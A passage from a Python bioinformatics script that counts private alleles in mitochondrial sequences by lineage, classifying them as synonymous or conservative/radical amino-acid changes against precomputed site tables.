'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 
'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
synSites = {">$Duluth":2591.52083333, ">$Heron2":2598, ">$McGregor":2599, ">$Waik36":2586.91666667, ">$WalesC":2584.91666667, ">$clone_1":2598, ">$AC51":2598.33333333, ">$Heron_mitochondrion":2599, ">$clone_7":2592.85416667, ">$Waik37":2586.58333333, ">$Gunn":2597.66666667, ">$DenmarkA":2593.125, ">$Waik372":2589.25, ">$Tarawera":2586.58333333, ">$Poerua_triploid":2597, ">$Kaniere_triploid":2586.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2593.79166667, ">$Brunner_2_4n":2593.60416674, ">$Brunner_6_3n":2592.9583334, ">$Grasmere_1_4n":2628.66666703, ">$Grasmere_6_3n":2599.62500001, ">$Poerua_72_4n":2605.47916675, ">$Rotoiti_1_4n":2594.35416672, ">$*Kaniere_1_2n":2598.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2595, ">$*Yellow_Contig_56":2592.33333333, ">$*Alexsex":2592.33333333, ">$*AlexMap":2592.33333333, ">$*Lady":2598.66666667, ">$*Ianthe":2597, ">$*Rotoroa_1_2n":2598.58333338}
C1Sites = {">$Duluth":6323.85416667, ">$Heron2":6320.33333333, ">$McGregor":6319, ">$Waik36":6330.25, ">$WalesC":6333.25, ">$clone_1":6319.66666667, ">$AC51":6318.66666667, ">$Heron_mitochondrion":6319.33333333, ">$clone_7":6322.52083333, ">$Waik37":6327.25, ">$Gunn":6324.33333333, ">$DenmarkA":6322.45833333, ">$Waik372":6330.58333333, ">$Tarawera":6329.25, ">$Poerua_triploid":6321.66666667, ">$Kaniere_triploid":6330.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":6320.125, ">$Brunner_2_4n":6259.27083326, ">$Brunner_6_3n":6262.95833327, ">$Grasmere_1_4n":5990.99999963, ">$Grasmere_6_3n":6307.62499999, ">$Poerua_72_4n":6232.81249992, ">$Rotoiti_1_4n":6264.68749995, ">$*Kaniere_1_2n":6320.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":6321, ">$*Yellow_Contig_56":6326.33333333, ">$*Alexsex":6326.33333333, ">$*AlexMap":6326.33333333, ">$*Lady":6318, ">$*Ianthe":6321.33333333, ">$*Rotoroa_1_2n":6271.58333329}
R1Sites = {">$Duluth":2298.625, ">$Heron2":2295.66666667, ">$McGregor":2296, ">$Waik36":2296.83333333, ">$WalesC":2295.83333333, ">$clone_1":2296.33333333, ">$AC51":2297, ">$Heron_mitochondrion":2295.66666667, ">$clone_7":2298.625, ">$Waik37":2300.16666667, ">$Gunn":2292, ">$DenmarkA":2298.41666667, ">$Waik372":2294.16666667, ">$Tarawera":2298.16666667, ">$Poerua_triploid":2295.33333333, ">$Kaniere_triploid":2296.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2300.08333333, ">$Brunner_2_4n":2361.125, ">$Brunner_6_3n":2358.08333333, ">$Grasmere_1_4n":2594.33333333, ">$Grasmere_6_3n":2306.75, ">$Poerua_72_4n":2375.70833333, ">$Rotoiti_1_4n":2354.95833333, ">$*Kaniere_1_2n":2295.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2298, ">$*Yellow_Contig_56":2295.33333333, ">$*Alexsex":2295.33333333, ">$*AlexMap":2295.33333333, ">$*Lady":2297.33333333, ">$*Ianthe":2295.66666667, ">$*Rotoroa_1_2n":2343.83333333}
C2Sites = {">$Duluth":5093.47916667, ">$Heron2":5090.33333333, ">$McGregor":5089.66666667, ">$Waik36":5100.75, ">$WalesC":5101.75, ">$clone_1":5091.33333333, ">$AC51":5089.33333333, ">$Heron_mitochondrion":5088.66666667, ">$clone_7":5092.14583333, ">$Waik37":5096.75, ">$Gunn":5090.33333333, ">$DenmarkA":5091.875, ">$Waik372":5097.41666667, ">$Tarawera":5097.08333333, ">$Poerua_triploid":5092, ">$Kaniere_triploid":5096.75, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5091.20833333, ">$Brunner_2_4n":5082.39583326, ">$Brunner_6_3n":5076.37499994, ">$Grasmere_1_4n":4999.33333297, ">$Grasmere_6_3n":5084.70833332, ">$Poerua_72_4n":5059.52083325, ">$Rotoiti_1_4n":5085.97916662, ">$*Kaniere_1_2n":5090, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5095.33333333, ">$*Yellow_Contig_56":5097.33333333, ">$*Alexsex":5097.33333333, ">$*AlexMap":5097.33333333, ">$*Lady":5089, ">$*Ianthe":5093, ">$*Rotoroa_1_2n":5078.41666662}
R2Sites = {">$Duluth":3529, ">$Heron2":3525.66666667, ">$McGregor":3525.33333333, ">$Waik36":3526.33333333, ">$WalesC":3527.33333333, ">$clone_1":3524.66666667, ">$AC51":3526.33333333, ">$Heron_mitochondrion":3526.33333333, ">$clone_7":3529, ">$Waik37":3530.66666667, ">$Gunn":3526, ">$DenmarkA":3529, ">$Waik372":3527.33333333, ">$Tarawera":3530.33333333, ">$Poerua_triploid":3525, ">$Kaniere_triploid":3530.66666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3529, ">$Brunner_2_4n":3538, ">$Brunner_6_3n":3544.66666667, ">$Grasmere_1_4n":3586, ">$Grasmere_6_3n":3529.66666667, ">$Poerua_72_4n":3549, ">$Rotoiti_1_4n":3533.66666667, ">$*Kaniere_1_2n":3525.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3523.66666667, ">$*Yellow_Contig_56":3524.33333333, ">$*Alexsex":3524.33333333, ">$*AlexMap":3524.33333333, ">$*Lady":3526.33333333, ">$*Ianthe":3524, ">$*Rotoroa_1_2n":3537}
C3Sites = {">$Duluth":2949.125, ">$Heron2":2945, ">$McGregor":2945, ">$Waik36":2947.16666667, ">$WalesC":2950.83333333, ">$clone_1":2944.66666667, ">$AC51":2945, ">$Heron_mitochondrion":2944.66666667, ">$clone_7":2949.79166667, ">$Waik37":2950.5, ">$Gunn":2944, ">$DenmarkA":2949.75, ">$Waik372":2952.83333333, ">$Tarawera":2950.5, ">$Poerua_triploid":2945.66666667, ">$Kaniere_triploid":2950.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2948.75, ">$Brunner_2_4n":2917.29166659, ">$Brunner_6_3n":2925.4166666, ">$Grasmere_1_4n":2832.33333297, ">$Grasmere_6_3n":2941.74999999, ">$Poerua_72_4n":2926.20833325, ">$Rotoiti_1_4n":2932.12499995, ">$*Kaniere_1_2n":2945.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2945.33333333, ">$*Yellow_Contig_56":2946.66666667, ">$*Alexsex":2946.66666667, ">$*AlexMap":2946.66666667, ">$*Lady":2947.33333333, ">$*Ianthe":2945.33333333, ">$*Rotoroa_1_2n":2928.16666662}
R3Sites = {">$Duluth":5673.35416667, ">$Heron2":5671, ">$McGregor":5670, ">$Waik36":5679.91666667, ">$WalesC":5678.25, ">$clone_1":5671.33333333, ">$AC51":5670.66666667, ">$Heron_mitochondrion":5670.33333333, ">$clone_7":5671.35416667, ">$Waik37":5676.91666667, ">$Gunn":5672.33333333, ">$DenmarkA":5671.125, ">$Waik372":5671.91666667, ">$Tarawera":5676.91666667, ">$Poerua_triploid":5671.33333333, ">$Kaniere_triploid":5676.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5671.45833333, ">$Brunner_2_4n":5703.10416667, ">$Brunner_6_3n":5695.625, ">$Grasmere_1_4n":5753, ">$Grasmere_6_3n":5672.625, ">$Poerua_72_4n":5682.3125, ">$Rotoiti_1_4n":5687.52083333, ">$*Kaniere_1_2n":5670, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5673.66666667, ">$*Yellow_Contig_56":5675, ">$*Alexsex":5675, ">$*AlexMap":5675, ">$*Lady":5668, ">$*Ianthe":5671.66666667, ">$*Rotoroa_1_2n":5687.25}
C4Sites = {">$Duluth":3422.02083333, ">$Heron2":3419.66666667, ">$McGregor":3420, ">$Waik36":3420.25, ">$WalesC":3423.25, ">$clone_1":3419.33333333, ">$AC51":3419, ">$Heron_mitochondrion":3419, ">$clone_7":3422.6875, ">$Waik37":3424.58333333, ">$Gunn":3420, ">$DenmarkA":3422.45833333, ">$Waik372":3428.25, ">$Tarawera":3424.91666667, ">$Poerua_triploid":3421, ">$Kaniere_triploid":3423.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3421.79166667, ">$Brunner_2_4n":3405.10416659, ">$Brunner_6_3n":3421.95833327, ">$Grasmere_1_4n":3382.99999963, ">$Grasmere_6_3n":3416.95833332, ">$Poerua_72_4n":3422.97916658, ">$Rotoiti_1_4n":3422.85416662, ">$*Kaniere_1_2n":3420.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3420, ">$*Yellow_Contig_56":3420.66666667, ">$*Alexsex":3420.66666667, ">$*AlexMap":3420.66666667, ">$*Lady":3423, ">$*Ianthe":3419.33333333, ">$*Rotoroa_1_2n":3414.91666662}
R4Sites = {">$Duluth":5200.45833333, ">$Heron2":5196.33333333, ">$McGregor":5195, ">$Waik36":5206.83333333, ">$WalesC":5205.83333333, ">$clone_1":5196.66666667, ">$AC51":5196.66666667, ">$Heron_mitochondrion":5196, ">$clone_7":5198.45833333, ">$Waik37":5202.83333333, ">$Gunn":5196.33333333, ">$DenmarkA":5198.41666667, ">$Waik372":5196.5, ">$Tarawera":5202.5, ">$Poerua_triploid":5196, ">$Kaniere_triploid":5203.83333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":5198.41666667, ">$Brunner_2_4n":5215.29166667, ">$Brunner_6_3n":5199.08333333, ">$Grasmere_1_4n":5202.33333333, ">$Grasmere_6_3n":5197.41666667, ">$Poerua_72_4n":5185.54166667, ">$Rotoiti_1_4n":5196.79166667, ">$*Kaniere_1_2n":5195.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":5199, ">$*Yellow_Contig_56":5201, ">$*Alexsex":5201, ">$*AlexMap":5201, ">$*Lady":5192.33333333, ">$*Ianthe":5197.66666667, ">$*Rotoroa_1_2n":5200.5}
C5Sites = {">$Duluth":4384.85416667, ">$Heron2":4382.33333333, ">$McGregor":4382, ">$Waik36":4383.58333333, ">$WalesC":4385.58333333, ">$clone_1":4382.33333333, ">$AC51":4382, ">$Heron_mitochondrion":4382.33333333, ">$clone_7":4385.1875, ">$Waik37":4385.58333333, ">$Gunn":4382.66666667, ">$DenmarkA":4385.125, ">$Waik372":4390.58333333, ">$Tarawera":4385.58333333, ">$Poerua_triploid":4383.33333333, ">$Kaniere_triploid":4386.25, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4383.79166667, ">$Brunner_2_4n":4338.9375, ">$Brunner_6_3n":4354.95833333, ">$Grasmere_1_4n":4238, ">$Grasmere_6_3n":4375.95833333, ">$Poerua_72_4n":4354.14583333, ">$Rotoiti_1_4n":4363.35416667, ">$*Kaniere_1_2n":4383.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4384, ">$*Yellow_Contig_56":4381.66666667, ">$*Alexsex":4381.66666667, ">$*AlexMap":4381.66666667, ">$*Lady":4385.33333333, ">$*Ianthe":4384.66666667, ">$*Rotoroa_1_2n":4354.91666667}
R5Sites = {">$Duluth":4237.625, ">$Heron2":4233.66666667, ">$McGregor":4233, ">$Waik36":4243.5, ">$WalesC":4243.5, ">$clone_1":4233.66666667, ">$AC51":4233.66666667, ">$Heron_mitochondrion":4232.66666667, ">$clone_7":4235.95833333, ">$Waik37":4241.83333333, ">$Gunn":4233.66666667, ">$DenmarkA":4235.75, ">$Waik372":4234.16666667, ">$Tarawera":4241.83333333, ">$Poerua_triploid":4233.66666667, ">$Kaniere_triploid":4241.16666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4236.41666667, ">$Brunner_2_4n":4281.45833326, ">$Brunner_6_3n":4266.08333327, ">$Grasmere_1_4n":4347.33333297, ">$Grasmere_6_3n":4238.41666665, ">$Poerua_72_4n":4254.37499992, ">$Rotoiti_1_4n":4256.29166662, ">$*Kaniere_1_2n":4232.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4235, ">$*Yellow_Contig_56":4240, ">$*Alexsex":4240, ">$*AlexMap":4240, ">$*Lady":4230, ">$*Ianthe":4232.33333333, ">$*Rotoroa_1_2n":4260.49999996}
C6Sites = {">$Duluth":4128.5625, ">$Heron2":4124.66666667, ">$McGregor":4124.33333333, ">$Waik36":4130.08333333, ">$WalesC":4129.75, ">$clone_1":4125.66666667, ">$AC51":4124.66666667, ">$Heron_mitochondrion":4125, ">$clone_7":4126.89583333, ">$Waik37":4123.41666667, ">$Gunn":4126.33333333, ">$DenmarkA":4127.04166667, ">$Waik372":4126.08333333, ">$Tarawera":4124.08333333, ">$Poerua_triploid":4126, ">$Kaniere_triploid":4125.75, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4126.04166667, ">$Brunner_2_4n":4078.47916674, ">$Brunner_6_3n":4075.2083334, ">$Grasmere_1_4n":3848.3333337, ">$Grasmere_6_3n":4112.54166668, ">$Poerua_72_4n":4050.43750008, ">$Rotoiti_1_4n":4084.39583338, ">$*Kaniere_1_2n":4126.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4125, ">$*Yellow_Contig_56":4127.33333333, ">$*Alexsex":4127.33333333, ">$*AlexMap":4127.33333333, ">$*Lady":4121, ">$*Ianthe":4123.66666667, ">$*Rotoroa_1_2n":4085.08333338}
R6Sites = {">$Duluth":4493.91666667, ">$Heron2":4491.33333333, ">$McGregor":4490.66666667, ">$Waik36":4497, ">$WalesC":4499.33333333, ">$clone_1":4490.33333333, ">$AC51":4491, ">$Heron_mitochondrion":4490, ">$clone_7":4494.25, ">$Waik37":4504, ">$Gunn":4490, ">$DenmarkA":4493.83333333, ">$Waik372":4498.66666667, ">$Tarawera":4503.33333333, ">$Poerua_triploid":4491, ">$Kaniere_triploid":4501.66666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4494.16666667, ">$Brunner_2_4n":4541.91666674, ">$Brunner_6_3n":4545.8333334, ">$Grasmere_1_4n":4737.00000037, ">$Grasmere_6_3n":4501.83333335, ">$Poerua_72_4n":4558.08333342, ">$Rotoiti_1_4n":4535.25000005, ">$*Kaniere_1_2n":4489.33333333, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4494, ">$*Yellow_Contig_56":4494.33333333, ">$*Alexsex":4494.33333333, ">$*AlexMap":4494.33333333, ">$*Lady":4494.33333333, ">$*Ianthe":4493.33333333, ">$*Rotoroa_1_2n":4530.33333338}
C7Sites = {">$Duluth":3873.77083333, ">$Heron2":3870.66666667, ">$McGregor":3870, ">$Waik36":3879.91666667, ">$WalesC":3880.58333333, ">$clone_1":3871.66666667, ">$AC51":3870.66666667, ">$Heron_mitochondrion":3870.33333333, ">$clone_7":3872.10416667, ">$Waik37":3874.25, ">$Gunn":3872.33333333, ">$DenmarkA":3871.625, ">$Waik372":3875.91666667, ">$Tarawera":3874.58333333, ">$Poerua_triploid":3872.66666667, ">$Kaniere_triploid":3875.91666667, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":3870.29166667, ">$Brunner_2_4n":3832.85416667, ">$Brunner_6_3n":3825.79166667, ">$Grasmere_1_4n":3635.33333333, ">$Grasmere_6_3n":3860.45833333, ">$Poerua_72_4n":3801.89583333, ">$Rotoiti_1_4n":3832.9375, ">$*Kaniere_1_2n":3871.66666667, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":3873.66666667, ">$*Yellow_Contig_56":3877, ">$*Alexsex":3877, ">$*AlexMap":3877, ">$*Lady":3869, ">$*Ianthe":3872.33333333, ">$*Rotoroa_1_2n":3832.58333333}
R7Sites = {">$Duluth":4748.70833333, ">$Heron2":4745.33333333, ">$McGregor":4745, ">$Waik36":4747.16666667, ">$WalesC":4748.5, ">$clone_1":4744.33333333, ">$AC51":4745, ">$Heron_mitochondrion":4744.66666667, ">$clone_7":4749.04166667, ">$Waik37":4753.16666667, ">$Gunn":4744, ">$DenmarkA":4749.25, ">$Waik372":4748.83333333, ">$Tarawera":4752.83333333, ">$Poerua_triploid":4744.33333333, ">$Kaniere_triploid":4751.5, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4749.91666667, ">$Brunner_2_4n":4787.54166659, ">$Brunner_6_3n":4795.24999994, ">$Grasmere_1_4n":4949.99999963, ">$Grasmere_6_3n":4753.91666665, ">$Poerua_72_4n":4806.62499992, ">$Rotoiti_1_4n":4786.70833328, ">$*Kaniere_1_2n":4744, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4745.33333333, ">$*Yellow_Contig_56":4744.66666667, ">$*Alexsex":4744.66666667, ">$*AlexMap":4744.66666667, ">$*Lady":4746.33333333, ">$*Ianthe":4744.66666667, ">$*Rotoroa_1_2n":4782.83333329}
meanCSites = {">$Duluth":4310.80952381, ">$Heron2":4307.57142857143, ">$McGregor":4307.14285714286, ">$Waik36":4313.14285714286, ">$WalesC":4314.99999999857, ">$clone_1":4307.80952381, ">$AC51":4307.04761904857, ">$Heron_mitochondrion":4307.04761904714, ">$clone_7":4310.19047619, ">$Waik37":4311.76190476143, ">$Gunn":4308.57142857, ">$DenmarkA":4310.04761904714, ">$Waik372":4314.52380952286, ">$Tarawera":4312.28571428429, ">$Poerua_triploid":4308.90476190571, ">$Kaniere_triploid":4312.80952380857, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4308.85714285857, ">$Brunner_2_4n":4273.47619044429, ">$Brunner_6_3n":4277.52380949714, ">$Grasmere_1_4n":4132.47619031857, ">$Grasmere_6_3n":4299.99999999429, ">$Poerua_72_4n":4263.99999996286, ">$Rotoiti_1_4n":4283.76190474143, ">$*Kaniere_1_2n":4308.23809523714, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4309.19047619, ">$*Yellow_Contig_56":4311, ">$*Alexsex":4311, ">$*AlexMap":4311, ">$*Lady":4307.52380952286, ">$*Ianthe":4308.52380952286, ">$*Rotoroa_1_2n":4280.80952379}
meanRSites = {">$Duluth":4311.66964285714, ">$Heron2":4308.42857142857, ">$McGregor":4307.85714285714, ">$Waik36":4313.94047619, ">$WalesC":4314.08333333143, ">$clone_1":4308.19047619, ">$AC51":4308.61904762, ">$Heron_mitochondrion":4307.95238095286, ">$clone_7":4310.95535714286, ">$Waik37":4315.65476190571, ">$Gunn":4307.76190476143, ">$DenmarkA":4310.82738095286, ">$Waik372":4310.22619047714, ">$Tarawera":4315.13095238, ">$Poerua_triploid":4308.09523809429, ">$Kaniere_triploid":4314.60714285714, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":4311.35119047714, ">$Brunner_2_4n":4346.91964284714, ">$Brunner_6_3n":4343.51785713429, ">$Grasmere_1_4n":4452.85714280429, ">$Grasmere_6_3n":4314.37499999857, ">$Poerua_72_4n":4344.52083332286, ">$Rotoiti_1_4n":4335.88392856429, ">$*Kaniere_1_2n":4307.42857142714, ">$*Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":4309.80952381, ">$*Yellow_Contig_56":4310.66666666571, ">$*Alexsex":4310.66666666571, ">$*AlexMap":4310.66666666571, ">$*Lady":4307.80952380714, ">$*Ianthe":4308.47619047714, ">$*Rotoroa_1_2n":4334.60714285143}
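#The dictionaries above appear to give, for each lineage (keyed by its FASTA header), the
#number of sites in each class: synonymous (synSites), conservative vs. radical under seven
#amino-acid property schemes (C1/R1 .. C7/R7), and their means (meanCSites/meanRSites). They
#are the denominators paired with the private-allele counts tallied below.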
logfile = open(fasta[0:-5] + '_singletons.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
refSeq = seqDict[popList[0]]
synDict = {}
meanCDict = {}
meanRDict = {}
C1Dict = {}
R1Dict = {}
C2Dict = {}
R2Dict = {}
C3Dict = {}
R3Dict = {}
C4Dict = {}
R4Dict = {}
C5Dict = {}
R5Dict = {}
C6Dict = {}
R6Dict = {}
C7Dict = {}
R7Dict = {}
for site in range(len(refSeq)):
codonNum = site // 3 #floor division keeps an integer codon index under both Python 2 and 3
pos = (site+1)%3
if pos == 1:
nucPos = 1
elif pos == 2:
nucPos = 2
elif pos == 0:
nucPos = 3
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if start <= site < stop: #half-open interval, so boundary sites (e.g. 1533) match only one gene
gene = positionDict[locus]
geneStart = locus[0]
if site == geneStart or site == (geneStart+1) or site == (geneStart + 2):
startCodon = True
else:
startCodon = False
currAlleleDict = {}
currAlleleList = []
currCodonDict = {}
currCodonList = []
allele2CodonTable = {}
for seq in popList:
if seq not in synDict:
synDict[seq] = 0
meanCDict[seq] = 0
meanRDict[seq] = 0
C1Dict[seq] = 0
R1Dict[seq] = 0
C2Dict[seq] = 0
R2Dict[seq] = 0
C3Dict[seq] = 0
R3Dict[seq] = 0
C4Dict[seq] = 0
R4Dict[seq] = 0
C5Dict[seq] = 0
R5Dict[seq] = 0
C6Dict[seq] = 0
R6Dict[seq] = 0
C7Dict[seq] = 0
R7Dict[seq] = 0
currSeq = seqDict[seq]
currCodons = codonDict[seq]
currNuc = currSeq[site]
currCodon = currCodons[codonNum]
allele2CodonTable[currNuc] = currCodon
if currCodon not in currCodonList and 'N' not in currCodon and '-' not in currCodon:
currCodonDict[currCodon] = [seq]
currCodonList.append(currCodon)
if currNuc not in currAlleleList:
currAlleleList.append(currNuc)
currAlleleDict[currNuc] = [seq]
else:
currList = currAlleleDict[currNuc]
currList.append(seq)
currAlleleDict[currNuc] = currList
elif 'N' not in currCodon and '-' not in currCodon:
currCodonSeqList = currCodonDict[currCodon]
currCodonSeqList.append(seq)
currCodonDict[currCodon] = currCodonSeqList
currList = currAlleleDict[currNuc]
currList.append(seq)
currAlleleDict[currNuc] = currList
if len(currAlleleDict) > 1:
singletonList = []
currAAList = []
for allele in currAlleleList:
if len(currAlleleDict[allele]) == 1:
singletonList.append(allele)
if len(singletonList) > 0 and len(currCodonDict) == 2:
if startCodon == True:
if currCodonList[0] in startCodons:
currAAList.append('M')
else:
currAAList.append(geneticCode[currCodonList[0]])
if currCodonList[1] not in startCodons and geneticCode[currCodonList[1]] not in currAAList:
currAAList.append(geneticCode[currCodonList[1]])
elif geneticCode[currCodonList[1]] not in currAAList:
currAAList.append('M')
else:
currAAList.append(geneticCode[currCodonList[0]])
if geneticCode[currCodonList[1]] not in currAAList:
currAAList.append(geneticCode[currCodonList[1]])
if len(currAAList) == 1:
currLineage = currAlleleDict[singletonList[0]]
synDict[currLineage[0]] += 1
else:
currLineage = currAlleleDict[singletonList[0]]
mutType = CRI(currAAList)
if mutType[0] == 0:
C1Dict[currLineage[0]] += 1
else:
R1Dict[currLineage[0]] += 1
if mutType[1] == 0:
C2Dict[currLineage[0]] += 1
else:
R2Dict[currLineage[0]] += 1
if mutType[2] == 0:
C3Dict[currLineage[0]] += 1
else:
R3Dict[currLineage[0]] += 1
if mutType[3] == 0:
C4Dict[currLineage[0]] += 1
else:
R4Dict[currLineage[0]] += 1
if mutType[4] == 0:
C5Dict[currLineage[0]] += 1
else:
R5Dict[currLineage[0]] += 1
if mutType[5] == 0:
C6Dict[currLineage[0]] += 1
else:
R6Dict[currLineage[0]] += 1
if mutType[6] == 0:
C7Dict[currLineage[0]] += 1
else:
R7Dict[currLineage[0]] += 1
if mutType[7] <= 0.5:
meanCDict[currLineage[0]] += 1
else:
meanRDict[currLineage[0]] += 1
elif len(singletonList) > 0:
logfile.write(str(site+1) + '\t' + str(nucPos) + '\t' + str(codonNum +1) + '\n')
sys.stdout.write('Lineage\t#Syn Private Alleles\t# Syn Sites\t# meanC Private Alleles\t# meanC Sites\t# meanR Private Alleles\t# meanR Sites\t# C1 Private Alleles\t# C1 Sites\t# R1 Private Alleles\t# R1 Sites\t# C2 Private Alleles\t# C2 Sites\t# R2 Private Alleles\t# R2 Sites\t# C3 Private Alleles\t# C3 Sites\t# R3 Private Alleles\t# R3 Sites\t# C4 Private Alleles\t# C4 Sites\t# R4 Private Alleles\t# R4 Sites\t# C5 Private Alleles\t# C5 Sites\t# R5 Private Alleles\t# R5 Sites\t# C6 Private Alleles\t# C6 Sites\t# R6 Private Alleles\t# R6 Sites\t# C7 Private Alleles\t# C7 Sites\t# R7 Private Alleles\t# R7 Sites\n')
for lineage in popList:
